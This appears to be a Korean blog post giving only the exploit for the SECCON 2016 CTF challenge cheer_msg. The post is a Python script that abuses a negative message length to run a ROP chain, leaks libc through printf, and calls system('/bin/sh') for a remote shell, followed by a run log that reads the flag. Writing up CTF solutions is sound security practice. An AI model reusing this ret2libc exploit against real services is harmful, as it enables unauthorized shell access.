본문 바로가기
Security/[게임] CTF 풀이

[exploit] 2016 SecconCTF - cheer_msg writeups (exploit only)

by blackcon 2016. 12. 11. 
#!/usr/bin/env python
import socket
import struct
import telnetlib
p = lambda x: struct.pack( "<I", x )
up = lambda x: struct.unpack( "<I", x )[0]


host = "localhost"
host = "cheermsg.pwn.seccon.jp"
port = 30527

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )

pppr = 0x80487ad
setbuf_got = 0x804A00c
printf_plt = 0x8048430

def u_recv( st ):
    bf = ''
    while st not in bf:
        bf += s.recv( 1 )
    return bf

## stage 1 ##
u_recv( "Message Length >>" )
s.send( "-150\n" )
u_recv( "Message >>" )

pay = p( printf_plt )
pay += p( pppr )
pay += p( 0x804887d ) # \nThank you %s!\nMessage : %s\n
pay += p( setbuf_got )
pay += p( setbuf_got )
pay += p( 0x80485ca ) # main

s.send( pay+"\n" )
data = u_recv( "Message : " )
data = u_recv( "Message : " )
data = data.split( "Thank you " )[1]
leak = data.split( "!\n" )[0]
leak = up( leak[:4] )

libc_base = leak - 0x00067b20    # setbuf offset: 0x67b20
system = libc_base + 0x00040310    # system offset: 0x40310
binsh  = libc_base + 0x16084c    # binsh offset: 0x16084c

## stage 2 ##
u_recv( "Message Length >>" )
s.send( "-150\n" )
u_recv( "Message >>" )

pay = p( system )
pay += p( 0x41414141 )
pay += p( binsh )
s.send( pay+"\n" )
print '#####'

t = telnetlib.Telnet()
t.sock = s
t.interact()

'''
blackcon@bk{~/seccon/exploit/cheer_msg}:./pay.py 
#####

Oops! I forgot to ask your name...
Can you tell me your name?

Name >> 
Thank you sY�AAAALxk�!
Message : 
id
uid=10792 gid=1001(cheer_msg) groups=1001(cheer_msg)
ls
cheer_msg
flag.txt
run.sh
cat flag.txt
SECCON{N40.T_15_ju571c3}
'''
저작자표시

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[crypto] 2016 SecconCTF - Vigenere writeups  (0) 2016.12.12
[exploit] 2016 SecconCTF - jmper writeups (exploit only)  (0) 2016.12.11
[exploit] 2016 SecconCTF - checker writeups (exploit only)  (0) 2016.12.11
2015 HUST hacking festival  (0) 2015.06.01
[coding] DEFCON CTF Qualifier 2015, catwestern Writeups  (0) 2015.05.18

관련글

티스토리툴바